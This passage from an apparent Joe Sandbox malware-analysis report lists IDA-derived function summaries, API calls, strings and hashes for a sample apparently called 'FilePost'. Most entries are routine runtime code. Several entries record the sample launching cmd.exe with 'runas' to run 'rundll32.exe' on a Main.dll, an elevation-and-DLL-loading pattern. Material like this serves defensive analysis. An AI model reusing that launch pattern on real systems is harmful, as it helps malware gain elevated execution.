                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextRandomRelease
                                          • String ID: ", ServiceCrtMain$/C rundll32.exe "$\Main.dll$\Main1.dll$cmd.exe$runas
                                          • API String ID: 3163166064-3989350086
                                          • Opcode ID: fca80fc1c70afd3e99f546018959882180c48ed4e880edd30ee4273bf8a7d01f
                                          • Instruction ID: 8ead844aa263c10ddc41382bda207fd7c17028868518f6614e2e51bcab174d78
                                          • Opcode Fuzzy Hash: fca80fc1c70afd3e99f546018959882180c48ed4e880edd30ee4273bf8a7d01f
                                          • Instruction Fuzzy Hash: B5120870D042488FEB04CFA8CC94BADB775FF49304F148298D515A768AD7F4AA85CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNEL32(000007D0), ref: 6D1447C7
                                          • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,?,00000000,00000000), ref: 6D14492D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExecuteShellSleep
                                          • String ID: ", ServiceCrtMain$/C rundll32.exe "$\Main.dll$\Main1.dll$cmd.exe$runas
                                          • API String ID: 4194306370-3989350086
                                          • Opcode ID: 9dfa74596ebe7dd2d2e6fb2e28c9a9689178a85c8225caaf4bde3a6f8113cd4f
                                          • Instruction ID: fdea9d7f5c20a75bfcd546747b0b726b3f42b63271f235cceabd74e3a268cf49
                                          • Opcode Fuzzy Hash: 9dfa74596ebe7dd2d2e6fb2e28c9a9689178a85c8225caaf4bde3a6f8113cd4f
                                          • Instruction Fuzzy Hash: 4BD1D870A042489FEB14CFA8CC94BADB775BF49304F24825CD115A768AD7F4AA85CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E399EF6
                                          • DName::operator+.LIBCMT ref: 6E399F49
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                            • Part of subcall function 6E398A8E: DName::operator+.LIBCMT ref: 6E398AAF
                                          • DName::operator+.LIBCMT ref: 6E399F3A
                                          • DName::operator+.LIBCMT ref: 6E399F9A
                                          • DName::operator+.LIBCMT ref: 6E399FA7
                                          • DName::operator+.LIBCMT ref: 6E399FEE
                                          • DName::operator+.LIBCMT ref: 6E399FFB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$shared_ptr
                                          • String ID: Y9n
                                          • API String ID: 1037112749-484334328
                                          • Opcode ID: a342379896bdef7d7514a7eb0525981af9d95211958962e6d3c43a6ae7703706
                                          • Instruction ID: 428df3c159698d18c1162954312806746742262a3da8d143ae31e0bc1058eb3b
                                          • Opcode Fuzzy Hash: a342379896bdef7d7514a7eb0525981af9d95211958962e6d3c43a6ae7703706
                                          • Instruction Fuzzy Hash: 49512CB2904219AEDB05CFE4C895EEEBBBCEF48704F044559E546A7280FB70D648DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DDFF
                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(6E39D7B6,6E39D7B6,00000010,Y9n,00000000,00000000,?,?,?,?,?,?,6E39D7B6,?,Y9n,00000000), ref: 6E39DE3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Decorator::getDimensionSignedatol
                                          • String ID: Y9n$`template-parameter$void$|+uyo
                                          • API String ID: 4068335672-3923180548
                                          • Opcode ID: 2ea75d1b19f2f9413b6a2dfde72c0a8609e216fa0ae58be1f44146129c7059af
                                          • Instruction ID: 164fdd8f0cdf5139348a6cca6a300cc1348dc59e0d54758e07a90be23e70f6b1
                                          • Opcode Fuzzy Hash: 2ea75d1b19f2f9413b6a2dfde72c0a8609e216fa0ae58be1f44146129c7059af
                                          • Instruction Fuzzy Hash: C2318F76D042099FDF04DBE8D855BEFB7BDAB49304F60042AD601B3180EB38AA08DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D171951
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D17195C
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171A50
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171A6D
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171A8A
                                          • DName::operator+.LIBCMT ref: 6D171A9F
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171AB9
                                          • DName::operator+.LIBCMT ref: 6D171B8E
                                            • Part of subcall function 6D16D97C: DName::DName.LIBVCRUNTIME ref: 6D16D9DA
                                          • DName::DName.LIBVCRUNTIME ref: 6D171C05
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
                                          • String ID:
                                          • API String ID: 3679549980-0
                                          • Opcode ID: 2f059cec497d0ebaaa03c305aa9c01a11711c1d2850f60bba3d0090dfec81330
                                          • Instruction ID: 1f3cca46c073351ae0bce2762a9c50263170be21e559120f305117035f0c3c02
                                          • Opcode Fuzzy Hash: 2f059cec497d0ebaaa03c305aa9c01a11711c1d2850f60bba3d0090dfec81330
                                          • Instruction Fuzzy Hash: 8BA1E372D4824A9ADB20CFF8D9A4BFE7B78AF16304F11501AD211B61ACDBF4D6858760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 216c18689a3da80fefeacda11338fdbd9759221f892e3f26e9ad8627e07d57d2
                                          • Instruction ID: 4fad09b7e0580959a9c1f051656c618e9df358dbe95e456e49ea77729f1706bc
                                          • Opcode Fuzzy Hash: 216c18689a3da80fefeacda11338fdbd9759221f892e3f26e9ad8627e07d57d2
                                          • Instruction Fuzzy Hash: 1061D572D04705EFE720CF64D840BAAB7F9EB45720F11445AEA56AB28AE7F19940CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6E39AFA1
                                          • UnDecorator::getSymbolName.LIBCMT ref: 6E39B033
                                          • DName::operator+.LIBCMT ref: 6E39B137
                                          • DName::DName.LIBVCRUNTIME ref: 6E39B1DA
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                            • Part of subcall function 6E398D5F: DName::DName.LIBVCRUNTIME ref: 6E398DBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                          • String ID: (o9n$(o9n$Y9n
                                          • API String ID: 1134295639-2217328249
                                          • Opcode ID: ed131465016f4fbd29972caf467a0ca1f98b9d2a7a50d15d6d7c95e32fb13f13
                                          • Instruction ID: e7ee2b1aa6c2063ef59a94f9037ef25b3c7e67a0c36865f461ae9db2c69db0c8
                                          • Opcode Fuzzy Hash: ed131465016f4fbd29972caf467a0ca1f98b9d2a7a50d15d6d7c95e32fb13f13
                                          • Instruction Fuzzy Hash: F6716BB5D0421A9FDF00CFD8C490BEEBBBDBF09350F24015AD951AB254E7359984EBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39E681
                                          • DName::operator+.LIBCMT ref: 6E39E68D
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                          • DName::operator+=.LIBCMT ref: 6E39E74B
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39CF50
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39D21A
                                            • Part of subcall function 6E398A8E: DName::operator+.LIBCMT ref: 6E398AAF
                                          • DName::operator+.LIBCMT ref: 6E39E708
                                            • Part of subcall function 6E398BBB: DName::operator=.LIBVCRUNTIME ref: 6E398BDC
                                          • DName::DName.LIBVCRUNTIME ref: 6E39E76F
                                          • DName::operator+.LIBCMT ref: 6E39E77B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                          • String ID: {for
                                          • API String ID: 2795783184-864106941
                                          • Opcode ID: 024292089bb98d40741c74a5051e0c3043139578cd54c6fd148e440e48f275b0
                                          • Instruction ID: cf06b13db656be9e42721cd3c3eab0e89451692a9cb0c323a11fbbfb045d941b
                                          • Opcode Fuzzy Hash: 024292089bb98d40741c74a5051e0c3043139578cd54c6fd148e440e48f275b0
                                          • Instruction Fuzzy Hash: BF4192B5A04708AFDB05DFE8C890BDE7BEDBB4A304F440858E196DB280F7369944D755
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6E39E791: Replicator::operator[].LIBCMT ref: 6E39E7CE
                                          • DName::operator=.LIBVCRUNTIME ref: 6E39D34D
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39CF50
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39D21A
                                          • DName::operator+.LIBCMT ref: 6E39D307
                                          • DName::operator+.LIBCMT ref: 6E39D313
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D365
                                          • DName::operator+.LIBCMT ref: 6E39D374
                                          • DName::operator+.LIBCMT ref: 6E39D380
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                          • String ID: Y9n
                                          • API String ID: 955152517-484334328
                                          • Opcode ID: 6d28698d5e0720f6f180c09bd5ca6fb5e25fa459b2c35268ccb11c85d2d9aba7
                                          • Instruction ID: 6fb0dc646f339cb560dd0f7621dde8b5e54c424c8b49f71a0c635a329cb0d8c2
                                          • Opcode Fuzzy Hash: 6d28698d5e0720f6f180c09bd5ca6fb5e25fa459b2c35268ccb11c85d2d9aba7
                                          • Instruction Fuzzy Hash: 9A314AB5A042049FCB08CFD8C491AEEBBFDBF99344F50885DE59A9B280FB349544DB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6E399AF7: Replicator::operator[].LIBCMT ref: 6E399B64
                                            • Part of subcall function 6E399AF7: DName::operator=.LIBVCRUNTIME ref: 6E399B87
                                          • DName::DName.LIBVCRUNTIME ref: 6E399CAD
                                          • DName::operator+.LIBCMT ref: 6E399CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Name::operator+Name::operator=Replicator::operator[]
                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                          • API String ID: 2366804779-2211150622
                                          • Opcode ID: 31513ecae87bbd5619fb19863026318a06ffd40c0c1e2fcdcd0b8a0430d1ce2c
                                          • Instruction ID: a6668069e430fc1935b50ed0e08b379e680651dda4409728ffd66cf6f63963dc
                                          • Opcode Fuzzy Hash: 31513ecae87bbd5619fb19863026318a06ffd40c0c1e2fcdcd0b8a0430d1ce2c
                                          • Instruction Fuzzy Hash: A13123B890060A9FCF41CFD8C4A1BEEBBF9BB06348F404549D565AB240E7369648EF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,6E398078,6E396248), ref: 6E398091
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E39809F
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E3980B8
                                          • SetLastError.KERNEL32(00000000,?,6E398078,6E396248), ref: 6E39810C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 648352df9d496a183fc8bb50f7c45973f9db4c8b9ca1c4889b5a3af02cd161da
                                          • Instruction ID: a3e802207b7ea94f1b1b34cf21e93e6d0570eb6e591879d981c835304aeb9b79
                                          • Opcode Fuzzy Hash: 648352df9d496a183fc8bb50f7c45973f9db4c8b9ca1c4889b5a3af02cd161da
                                          • Instruction Fuzzy Hash: 7C012877118A12AEEB654EFEEC8458F3A5CEB873B433006AAF960821D4FF564884F150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___TypeMatch.LIBVCRUNTIME ref: 6D16BA3B
                                          • _UnwindNestedFrames.LIBCMT ref: 6D16BB8D
                                          • CallUnexpected.LIBVCRUNTIME ref: 6D16BBA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind
                                          • String ID: csm$csm$csm
                                          • API String ID: 3456342781-393685449
                                          • Opcode ID: 2dae6837e03d70a89292e8ab678d2caf1799cb180c87e5166810368e8d9df4c1
                                          • Instruction ID: 5c771f516e1a0ae4efe1be2f91232ef84ad0bcedafe131f885a76e6523beda16
                                          • Opcode Fuzzy Hash: 2dae6837e03d70a89292e8ab678d2caf1799cb180c87e5166810368e8d9df4c1
                                          • Instruction Fuzzy Hash: 15B19D7180828AEFCF05DFA4CA809AEBBB5FF14314B11405AF9116B21DD7B1DA61CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D141B73
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D141BBF
                                          • __Getctype.LIBCPMT ref: 6D141BD8
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6D141BF4
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D141C89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                          • String ID: bad locale name
                                          • API String ID: 1840309910-1405518554
                                          • Opcode ID: 2c8098701389d90521ab2e26a6032e177fcf3ca417ac0a25e5bd4d890ca52202
                                          • Instruction ID: 078a1a2f9246eed5f1023864f26ba8c71a307ccdf691166b6bb513d04820b125
                                          • Opcode Fuzzy Hash: 2c8098701389d90521ab2e26a6032e177fcf3ca417ac0a25e5bd4d890ca52202
                                          • Instruction Fuzzy Hash: 4B51A1B1D042889BEB10CFE4DD44B9EBBB8AF24304F148169DD18A7348E7B5E555CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D16DDE3
                                          • DName::operator+.LIBCMT ref: 6D16DE36
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                            • Part of subcall function 6D16C97B: DName::operator+.LIBCMT ref: 6D16C99C
                                          • DName::operator+.LIBCMT ref: 6D16DE27
                                          • DName::operator+.LIBCMT ref: 6D16DE87
                                          • DName::operator+.LIBCMT ref: 6D16DE94
                                          • DName::operator+.LIBCMT ref: 6D16DEDB
                                          • DName::operator+.LIBCMT ref: 6D16DEE8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$shared_ptr
                                          • String ID:
                                          • API String ID: 1037112749-0
                                          • Opcode ID: acbdac36c1897775da30ca836d6b072611b089ef2132d4213fc92773da090fc6
                                          • Instruction ID: eeb69d58ca684a50c911ee763a2399089719f92c4ab1579f681ad2a2e8208cae
                                          • Opcode Fuzzy Hash: acbdac36c1897775da30ca836d6b072611b089ef2132d4213fc92773da090fc6
                                          • Instruction Fuzzy Hash: 8551A1B1904299AFDF05DBA4C851EEEBFB9AF58304F11405AF601A7188EBB49654CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6D164E0A
                                          • GetLastError.KERNEL32(0000000A), ref: 6D164E35
                                          Strings
                                          • Timer: QueryPerformanceCounter failed with error , xrefs: 6D164E50
                                          • Timer: QueryPerformanceFrequency failed with error , xrefs: 6D164F3B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CounterErrorLastPerformanceQuery
                                          • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                          • API String ID: 1297246462-2136607233
                                          • Opcode ID: 0b110b55086e5aa65609a004af7ee21e520f3a052e555999ccf12ae86972dd17
                                          • Instruction ID: 63b59145d388f07f4f09bf71499084d0f6b77f799adb92a840aa34db4d427e2a
                                          • Opcode Fuzzy Hash: 0b110b55086e5aa65609a004af7ee21e520f3a052e555999ccf12ae86972dd17
                                          • Instruction Fuzzy Hash: B14191B1D08288EFCB00DFE4D944FAEB7B8FB09704F10415AE925E7685DBB8A518CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualQuery.KERNEL32(?,|+uy,0000001C,79752B7C,?,?,?), ref: 6E3944F6
                                          • __FindPESection.LIBCMT ref: 6E394533
                                          • _ValidateScopeTableHandlers.LIBCMT ref: 6E394553
                                          • __FindPESection.LIBCMT ref: 6E39456D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                          • String ID: d.9n$|+uy
                                          • API String ID: 1876002356-1583235331
                                          • Opcode ID: e9e0e8129cd6660817b902a88b18f81df5f0c83517424cf9b0b277ef1c00be24
